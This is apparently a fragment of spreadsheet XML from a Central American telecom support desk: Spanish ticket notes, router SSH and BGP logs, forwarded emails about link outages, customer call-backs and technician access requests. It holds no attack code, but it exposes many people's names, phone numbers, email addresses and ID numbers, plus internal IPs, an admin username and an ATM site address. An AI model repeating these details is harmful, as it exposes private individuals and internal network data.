000110: .JUN  7 23:32:41.187 ELS: %SSH-5-SSH2_SESSION: SSH2 SESSION REQUEST FROM 10.130.91.161 (TTY = 0) USING CRYPTO CIPHER 'AES256-CTR', HMAC 'HMAC-SHA1' FAILED
000111: .JUN  7 23:32:41.187 ELS: %SSH-5-SSH2_CLOSE: SSH2 SESSION FROM 10.130.91.161 (TTY = 0) FOR USER '' USING CRYPTO CIPHER 'AES256-CTR', HMAC 'HMAC-SHA1' CLOSED
000112: .JUN  7 23:33:57.839 ELS: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 10.130.91.161
000113: .JUN  7 23:33:57.839 ELS: %SSH-5-SSH2_SESSION: SSH2 SESSION REQUEST FROM 10.130.91.161 (TTY = 0) USING CRYPTO CIPHER 'AES256-CTR', HMAC 'HMAC-SHA1' FAILED
000114: .JUN  7 23:33:57.839 ELS: %SSH-5-SSH2_CLOSE: SSH2 SESSION FROM 10.130.91.161 (TTY = 0) FOR USER '' USING CRYPTO CIPHER 'AES256-CTR', HMAC 'HMAC-SHA1' CLOSED
000115: .JUN  7 23:35:18.470 ELS: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 10.130.91.161
000116: .JUN  7 23:35:18.470 ELS: %SSH-5-SSH2_SESSION: SSH2 SESSION REQUEST FROM 10.130.91.161 (TTY = 0) USING CRYPTO CIPHER 'AES256-CTR', HMAC 'HMAC-SHA1' FAILED
000117: .JUN  7 23:35:18.470 ELS: %SSH-5-SSH2_CLOSE: SSH2 SESSION FROM 10.130.91.161 (TTY = 0) FOR USER '' USING CRYPTO CIPHER 'AES256-CTR', HMAC 'HMAC-SHA1' CLOSED
RELSSMIGTA#                     SHO CLOC
.23:40:32.689 ELS TUE JUN 7 2022
RELSSMIGTA#</t>
  </si>
  <si>
    <t>F4593754</t>
  </si>
  <si>
    <t>***---  TELMEX INDICA QUE SE REVISE SI SE HICIERON PRUEBAS EN EL ENLACE CORRECTO YA QUE ELLOS AUN VEN CAIDO EL ENLACE --**
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: MIÉRCOLES, 8 DE JUNIO DE 2022 04:20
PARA: IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL SBMINT036 ::: TICKET CNOC IMSCI002995 ::: "ENLACE FUERA DE SERVICIO"
BUEN DIA TEAM
¿SI SE ESTÁ REVISANDO EL CIRCUITO CORRECTO?, YA QUE AUN LO VEMOS FUERA
CID: CONTR0002277124OC
IP WAN: 10.22.2.45
*JUN  8 09:00:25.158 UTC: %BGP-3-NOTIFICATION: SENT TO NEIGHBOR 10.22.2.46 4/0 (HOLD TIME EXPIRED) 0 BYTES
*JUN  8 09:00:25.158 UTC: %BGP-5-NBR_RESET: NEIGHBOR 10.22.2.46 RESET (BGP NOTIFICATION SENT)
*JUN  8 09:00:25.160 UTC: %BGP-5-ADJCHANGE: NEIGHBOR 10.22.2.46 DOWN BGP NOTIFICATION SENT
*JUN  8 09:00:25.160 UTC: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 10.22.2.46 IPV4 UNICAST TOPOLOGY BASE REMOVED FROM SESSION  BGP NOTIFICATION SENT
*JUN  8 09:13:49.886 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: CN0C.1NTL-L@T4M] [SOURCE: 201.129.227.244] [LOCALPORT: 22] AT 09:13:49 UTC WED JUN 8 2022
*JUN  8 10:24:20.129 UTC: %SYS-6-LOGOUT: USER CN0C.1NTL-L@T4M HAS EXITED TTY SESSION 2(201.129.227.244)
*JUN  8 10:32:10.038 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: CN0C.1NTL-L@T4M] [SOURCE: 201.129.227.244] [LOCALPORT: 22] AT 10:32:10 UTC WED JUN 8 2022
RR01SCT-F2S-M04619CR-CR8205-NP#SHOW IP BGP SUMMARY
BGP ROUTER IDENTIFIER 10.22.2.45, LOCAL AS NUMBER 65503
BGP TABLE VERSION IS 129460, MAIN ROUTING TABLE VERSION 129460
649 NETWORK ENTRIES USING 160952 BYTES OF MEMORY
655 PATH ENTRIES USING 89080 BYTES OF MEMORY
163/82 BGP PATH/BESTPATH ATTRIBUTE ENTRIES USING 45640 BYTES OF MEMORY
79 BGP AS-PATH ENTRIES USING 6968 BYTES OF MEMORY
4 BGP COMMUNITY ENTRIES USING 96 BYTES OF MEMORY
2 BGP ROUTE-MAP CACHE ENTRIES USING 128 BYTES OF MEMORY
0 BGP FILTER-LIST CACHE ENTRIES USING 0 BYTES OF MEMORY
BGP USING 302864 TOTAL BYTES OF MEMORY
BGP ACTIVITY 11808/11159 PREFIXES, 53982/53327 PATHS, SCAN INTERVAL 60 SECS
NEIGHBOR        V           AS MSGRCVD MSGSENT   TBLVER  INQ OUTQ UP/DOWN  STATE/PFXRCD
10.22.2.33      4        65490 1935164 1983091   129460    0    0 30W3D          11
10.22.2.38      4        14754 2314222 1954666   129460    0    0 30W5D         643
10.22.2.46      4        14754       0       0        1    0    0 01:34:04 IDLE
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>SE HABLÓ CON ILEANA RAMOS/CLIENTE 00 525551745299 INDICA QUE HARÁ SUS PRUEBAS INTERNAS, PIDE SE LE LLAME EN UNA HORA PARA SEGUIMIENTO Y/O VALIDAR SERVICIO.
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL SBMINT036 ::: TICKET CNOC IMSCI002995 ::: "ENLACE FUERA DE SERVICIO"</t>
  </si>
  <si>
    <t>**** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE, A LA ESPERA DE CONFIRMACIÓN Y AUTORIZACIÓN DE LOS MISMOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 9:05
PARA: JURGEN RENE BOCH CAAL &lt;JURGEN.BOCH@CLARO.COM.GT&gt;; VITAL CUEVAS OSCAR ALBERTO &lt;OVCUEVAS@UNINET.COM.MX&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; JOSE DAVID RAMIREZ STAMBUK &lt;JOSEDAV.RAMIREZ@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL SBMINT036 ::: TICKET CNOC IMSCI002995 ::: "ENLACE FUERA DE SERVICIO"
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HA GENERADO UNA VISITA TÉCNICA, POR LO QUE SE REQUIERE DE SU APOYO EN LA GESTIÓN Y AUTORIZACIÓN DE ACCESOS PARA EL PERSONAL QUE SE DESCRIBE A CONTINUACIÓN:
MAURICIO GONZALEZ , CEDULA: 5-339-338
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 CONTESTAN PERO DEJAN EN ESPERA Y NO RETOMAN LLAMADA || SE INTENTARA LUEGO **
ID 1001929027
**</t>
  </si>
  <si>
    <t>F4593781</t>
  </si>
  <si>
    <t>***--- SE NOTIFICA A CNOC VÍA SKYPE DE LOA APERTURA DE SD Y QUE SE ASOCIA A INCIDENTE --***
COLA DE CORREO
ENLACE CAÍDO DE MAXI DESPENSA PUERTO BARRIOS ID: 344400187</t>
  </si>
  <si>
    <t>F4593812</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  PABLO DELGADO 40223690 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001096553</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  PABLO DELGADO 40223690 MENCIONA QUE NECESITA REALIZAR PRUEBAS Y EN ESTE MOMENTO SE DIRIGE ALGUIEN A PR PERO NO TIENE HORA APROXIMADA POR LO QUE SOLICITA LLAMADA A LAS 16:00 HRS
-ID 2001010811</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER AL 40146159 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
ID 1001917019
**</t>
  </si>
  <si>
    <t>**SE LLAMA A LA SRITA.  ERENDIDA 32025097 NO RESPONDE || ENVIA A BUZON **
ID 1001916887
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  SARAI LOPEZ AL 32033017  INDICA QUE LE TOCO CAMPO QUE NO FUE A OFICINA PERO QUE SE LE LLAME A LA SRITA.  ERENDIDA 32025097 O  WALTER 40146159 **
ID 1001915830
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIANA MENDEZ AL 32033017 CONTESTA LA SEÑORITA SARAI LOPEZ INDICA QUE NO HA LLEGADO A LA OFICINA QUE SE LE LLAME A LAS 8:20 NUEVAMENTE **
ID 1001902717
**</t>
  </si>
  <si>
    <t>-* SE LLAMA AL  ERENDIDA 32025097 ||   WALTER 40146159  ID . 1001948356 || 1001948408  |   NO RESPONDEN EN EL PRIMER NUMERO Y EL SEGUNDO EL SEÑOR WALTER INDICA QUE SALIO A CAMPO Y QUE SE SE LLAME EN 30 MIN NUEVAMENE *-*
ID 1001982467 - 1001982558
**</t>
  </si>
  <si>
    <t>**SE LLAMA A LA SRITA.  ERENDIDA 32025097 NO RESPONDE SE LLAMA AL SEÑOR WALTER AL 40146159 TAMPOCO NO RESPONDEN AMBOS ENVIAN A BUZON || SE INTENTARA LUEGO **
ID 1001937691 - 1001937790
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  PABLO DELGADO  AL 40223690  NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001080653
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PABLO DELGADO 40223690 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001072006</t>
  </si>
  <si>
    <t>F4593863</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO GARCIA AL 55853360  SOLICITA QUE SE LE DEJE EN OBSERVACION PARA LAS
14:30 HRS **
ID 1001919635
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ROBERTO GARCIA 55853360 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001042309</t>
  </si>
  <si>
    <t>F4593871</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 17:29
PARA: ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; EDGARDO TURCIOS SALGADO &lt;EDGARDO.TURCIOS@ST-GROUP.COM&gt;; DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&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 GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: PROBLEMAS EN RED CLARO | HONDURAS AMERICAN TABACO
BUENA TARDE
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, EL CORTE DE FIBRA ÓPTICA YA FUE REPARADO.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDGARDO TURICIOS 97031175 QUIEN SOLICITA SE ENVIE CORREO INFORMANDO QUE YA SE FINALIZO LA REPARACION
-ID 2001090616</t>
  </si>
  <si>
    <t>F4593891</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN RODRIGUEZ 30430559 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001995127</t>
  </si>
  <si>
    <t>F4593894</t>
  </si>
  <si>
    <t>SE LLAMAA  CLEINTE CRISTIAN ESCOBAR-46558984 ##CLIENTE VALIDA ##VIVO</t>
  </si>
  <si>
    <t>F4593897</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LISBETH  AL 58644804 || SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
ID 1001924716
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 58644804 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001002030</t>
  </si>
  <si>
    <t>F4593898</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS ORTIZ 85296467 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001076236</t>
  </si>
  <si>
    <t>*** SE LLAMA A CLIENTE EN PUNTO REMOTO Y ATIENDE OPERADORA 505 75130800 (ID 2001005593), QUIEN NOS TRANSFIERE CON GUILLERMO NAVARRETE, PERO NO CONTESTA. YA QUE SOLO DA TONO DE LLAMADA ENTRANTE ***</t>
  </si>
  <si>
    <t>*** SE HABLA CON CLIENTE EN CENTRAL CARLOS 505 85296467 (ID 2001006610), QUIEN SOLICITA LOS DATOS, Y SE LE BRINDAN POR CORREO. DARÁ GESTIÓN A LA SOLICITUD DE ACCESOS Y QUE SE PRESENTE EN 5 MIN APROX. (SE NOTIFICA A BYRON VANEGAS QUE LE DARÁN INGRESO EN UNOS MOMENTOS) ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 12:48
PARA: GRPREDES@FDL.COM.NI &lt;GRPREDES@FDL.COM.NI&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: FINANCIERA FDL -- 452593ON -- FDL JINOTEPE
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HA GENERADO UNA VISITA TÉCNICA, POR LO QUE SE REQUIERE DE SU APOYO EN LA GESTIÓN Y AUTORIZACIÓN DE ACCESOS PARA EL PERSONAL QUE SE DESCRIBE A CONTINUACIÓN:
BYRON VANEGAS - 201 231089 0007K
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUILLERMO NAVARRETE 75130800 QUIEN SOLICITA SE VALIDE CON CARLOS ORTIZ 85296467
-ID 2001072454</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS ORTIZ 85296467 MENCIONA QUE NO SE ENCUETRA EN SU OFICINA POR LO QUE SOLICITA LLAMADA EN 5 MIN
-ID 2001073828</t>
  </si>
  <si>
    <t>F4593901</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EN PR JOBED MAZARIEGOS 58097909 QUIEN VALIDA SERVICIO OPERATIVO Y ESTABLE || AUTORIZA CIERRE DE TICKET
2001072560
COLA:
NOMBRE: A: 58097909
NÚMERO: 011 50258097909
DURACIÓN: 0:01:36
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50258097909
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 8/06/2022 16:14:21</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA PRUEBAS PERO NO RESPONDE---
58097909</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOBED MAZARIEGOS  AL 58097909 INDICA QUE ESTA EN SITIO SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 1001933708
**</t>
  </si>
  <si>
    <t>SE HABLÓ CON AXEL DANILO/TÉCNICO 58263317 INDICA QUE ESTÁ EN EL MDF ESCUINTLA HACIENDO LA REVISIÓN, AVANCES EN UNA HORA.
ADICIONAL SE LLAMÓ/HABLÓ CON BRANDON ORTIZ/CLIENTE 24128418 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4593905</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE CESAR SAENZ 55136028 ID: 1001956497 / 1001956649 /
CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT | SE NOTIFICA A WAGNER.POLANCO VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4593906</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JORGE QUINTANILLA QUIEN VALIDA EL SERVICIO Y AUTORIZA EL CIERRE.
2001043590
COLA:
NOMBRE: A: 0050370521291
NÚMERO: 0050370521291
DURACIÓN: 0:00:13
ESTADO: CONECTADA
DETALLES: 0050370521291
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 8/06/2022 14:41:03</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JORGE QUITANILLA PERO ENVIA A BUZON.
SE LLAMARA ENSEGUIDA.
2001032987
COLA:
NOMBRE: A: 0050370521291
NÚMERO: 0050370521291
DURACIÓN: 0:00:21
ESTADO: MARCANDO
DETALLES: 0050370521291
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 8/06/2022 14:06:31</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE JORGE QUINTANA E INDICÓ QUE NO TIENE LLAMADAS SALIENTES SOLO LLAMADAS ENTRANTES, SE PROCEDIO A REINICAR EQUIPO ASMI54 Y ASMI54 PERO EL SERVICIO CONTINUA CON ERROR SE PROCEDERA A SOLICITAR VISITA TECNICA</t>
  </si>
  <si>
    <t>F4593919</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM TOBAR 55109507 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001925431</t>
  </si>
  <si>
    <t>F4593928</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS TOC AL 59183858 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001921444
**</t>
  </si>
  <si>
    <t>F4593930</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN MORALES 24210880 EXT. 129 MENCIONA QUE OBSERVA EL SERVICIO OPERATIVO PERO SOLICITA LLAMADA PARA EL MEDIO DIA
-ID 1001932733</t>
  </si>
  <si>
    <t>F4593937</t>
  </si>
  <si>
    <t>SE HABLÓ CON ESTEBAN GUDIEL/CLIENTE 23049696 INDICA QUE ENLACE INESTABLE, TICKET APERTURADO POR CAÍDA TOTAL, AUTORIZA CIERRE DEL TICKET.
SE APERTURA NUEVO TICKET SD1133430/F4594723 CON EL ESCENARIO ACTUAL.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NATALI CRUZ  23049696 ESTEBAN MENCIONA QUE OBSERVA TIEMPOS ALTOS PERO VALIDARA CON CLIENTE FINAL SI TODO ESTA BIEN POR LO QUE SOLICITA LLAMADA PARA LAS 13:00 HRS VALIDAR EL FUNCIONAMIENTO
-ID 1001933772</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CENTRAL VALIDARÁ CON SU CLIENTE FINAL, SEGUIMIENTO Y/O VALIDAR SERVICIO A LAS 13:00 HORAS.</t>
  </si>
  <si>
    <t>F4593949</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDYN YUPANQUI AL 47962445 SE CONTACTA A CLIENTE Y SE DEJA
EN LINEA CON GESTOR**
-ID 1001931383
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS BARCENAS AL 50035803 INDICA QUE NO ESTA EN  LA FISCALIA SOLICITA QUE SE LE LLAME AL SEÑOR EDYN YUPANQUI AL 47962445 **
ID 1001930204
**</t>
  </si>
  <si>
    <t>F4593960</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KENETH TEJADA 42271739 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001936540 - 1001937020</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KENETH TEJADA 42271739 INFORMA QUE NO CUENTAN CON ENERGIA EN EL SITIO **
-ID 1001953493
**</t>
  </si>
  <si>
    <t>F4593969</t>
  </si>
  <si>
    <t>SE LLAMA A LIENTE CARLOS MANZANERO 41753805 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO 47893409 - OFICIAL
-ID 1001938730</t>
  </si>
  <si>
    <t>2001014450
COLA:
NOMBRE: A: 58261199
NÚMERO: 58261199
DURACIÓN: 0:00:59
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58261199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 8/06/2022 13:07:05
TECNICOS A 25 MINUTOS DE SITIO</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                        		SD	10:57 A. M.
1/4	JORGE FINGADO	58261199	2 HORAS	12:57 P. M.
2/4	JORGE FINGADO	58261199	3 HORAS	13:57:00
3/4	RENE AGUSTIN	58261183	5 HORAS	15:57:00
4/4	RODOLFO MORALES	58261609	6 HORAS	16:57:00</t>
  </si>
  <si>
    <t>SE LLAMA A PR 47893409 MENCIONA SI CUENTAN CON ENERGIA, SE DEJA EN CONFERENIA CON GESTOR
-ID 1001942289</t>
  </si>
  <si>
    <t>F4593974</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MANZANERO 41753805 MENCIONA QUE VALIDARA CON PR Y SOLICITA LLAMADA EN 10 MIN
-ID 1001938730</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 41753805 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 1001948892</t>
  </si>
  <si>
    <t>F4593990</t>
  </si>
  <si>
    <t>F4593993</t>
  </si>
  <si>
    <t>CLIENTE SUSAN SOSA-51111877     VALIDA ##
RESULTADO: LLAMADA HECHA
NOMBRE: 51111877
NÚMERO: 51111877
INICIO: HOY, 09:27
FIN: HOY, 09:29
DURACIÓN: 1:35
ID DE LLAMADA: 1001932575</t>
  </si>
  <si>
    <t>F4593995</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO PEREZ  - 36571015 NO RESPONDE, ES INTENTARA LUEGO
-ID 1001961194 - 1001961433</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JULIO PEREZ 36571015 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001990308 - 1001990774</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO PEREZ 36571015 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001980153</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO PEREZ 36571015 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001930746 - 1001932027</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO PEREZ 36571015 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICIRA LLAMADA EN 15 MIN
-ID 1001953179</t>
  </si>
  <si>
    <t>F4594000</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE JULIO PEREZ  36571015 ID: 2001008046
COMENTA QUE EL SERVICIO YA ESTA FUNCIONANDO CORRECTAMENTE, AUTORIZA CIERRE DE TKT, SE NOTIFICA A LUIS.IXCOT VIA SKYPE | WIP
SE TERMINARA DE VALIDAR MEDIANTE SD</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 36571015 PARA SEGUIMIENTO, NO CONTESTA; SE LLAMÓ A LA CENTRAL 24119191 EXT 10582 PARA VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4594008</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A 5B SOLICITANDO VISITA PARA MAÑANA VIERNES A LAS 10 AM || PENDIENTE CONFIRMACIÓN
ASUNTO: SOLICITUD VISITA TÉCNICA ATM3066 || UBICADO EN SUPER TIENDA GLORIA, 0 CALLE 0-16 ZONA 3 SAN JERONIMO BAJA VERAPAZ
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS TYT.
EN SEGUIMIENTO AL SERVICIO ATM3066 || UBICADO EN SUPER TIENDA GLORIA, 0 CALLE 0-16 ZONA 3 SAN JERONIMO BAJA VERAPAZ. LE COMENTO QUE POR MONITOREO PROACTIVO SE TIENE ALARMADO EL SERVICIO POR LO CUAL ESTAMOS SOLICITANDO NOS APOYEN EN GESTIONAR VISITA EN CONJUNTO PARA APERTURA DE ATM Y PROCEDER CON VERIFICAR EQUIPOS Y MEDIO EL DÍA DE MAÑANA VIERNES 10/06 A LAS 10:00 HRS.</t>
  </si>
  <si>
    <t>F4594015</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA MEDINA/89266128 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001959632</t>
  </si>
  <si>
    <t>F4594016</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 95554686 MENCIONA QUE YA APLICARON REINICIO PERO EL INCONVENIENTE PERSISTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001956354</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EMERSON ALEXANDER AL 95554686  BRINDA LOS SIGUIENTES DATOS**
HORARIO DE ATENCION: 8:00 AM A 16:30 PM
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: COLONIA CAMPAÑA AL SUR DEL INSTITUTO SAN JOSE DEL CARMEN.
ATENDERA EN SITIO: EMERSON ALEXANDER - 95554686
-ID 2001001811
**</t>
  </si>
  <si>
    <t>SE VALIDA NO SE TIENE CONTACTOS EN SITIO.- SE ENVIA CORREO A CL SOLICITANDOLO
FALLA DE ENLACE - FICOHSA PROVEEDURÍA COL. LA CAMPAÑA</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE --
1072889OH - DISEÑO</t>
  </si>
  <si>
    <t>F4594021</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON PERSONAL TÉCNICO A ASIGNAR; ADICIONAL SE LLAMÓ/HABLÓ CON ANGIE CHÁVEZ/CLIENTE  506 70460308 Y SE LE BRINDAN AVANCES DEL TICKET.
EN CUANTO TÉCNICO ESTÉ CERCA PIDE SE LE LLAME PARA AVISAR A SEGURIDAD PARA EL INGRESO.</t>
  </si>
  <si>
    <t>CLIENTE  ANGIE CHAVEZ 506 70460308 UNICAMENTE LOGRA UBICAR SU PLANTA PBX MARCA NEC. NO LOGRA UBICAR EL EQUIPO DE FIBRA, CLIENTE REINICIA SU PLANTA PBX PERO EL INCONVENIENTE PERSISTE, INDICA QUE SÓLO TIENE PROBLEMA CON SU SERVICIO DE TELEFONÍA, EL INTERNET ESTA OPERATIVO, SOLICITA VISITA TÉCNICA. ID: 1001939848</t>
  </si>
  <si>
    <t>F4594027</t>
  </si>
  <si>
    <t>SE LLAMA A TEC IVAN ARRAZOLA COMENTA QUE EL SERVICIO YA ESTA RESTABLECIDO SE CAMBIO DE PUERTO A LA EXT EN EL ODF DEL CLIENTE Y SE TUVO QUE REALIZAR UN CABLEADO NUEVO##LLAMADA DESDE VIVO
##SE DETIENE TIEMPO DE ESCALACION</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CAROLINA 34471674 PARA SOLICITAR DATOS DE VISITA
-ID 1001989410
NOMBRE DEL CLIENTE: TRIBUNAL SUPREMO ELECTORAL
UBICACIÓN:6 AVENIDA 0-32 ZONA 2  EDIFICIO CENTRAL
CONTACTO EN SITIO: CAROLINA 34471674
HORARIO DE ATENCION: HASTA LAS 14:00 HRS
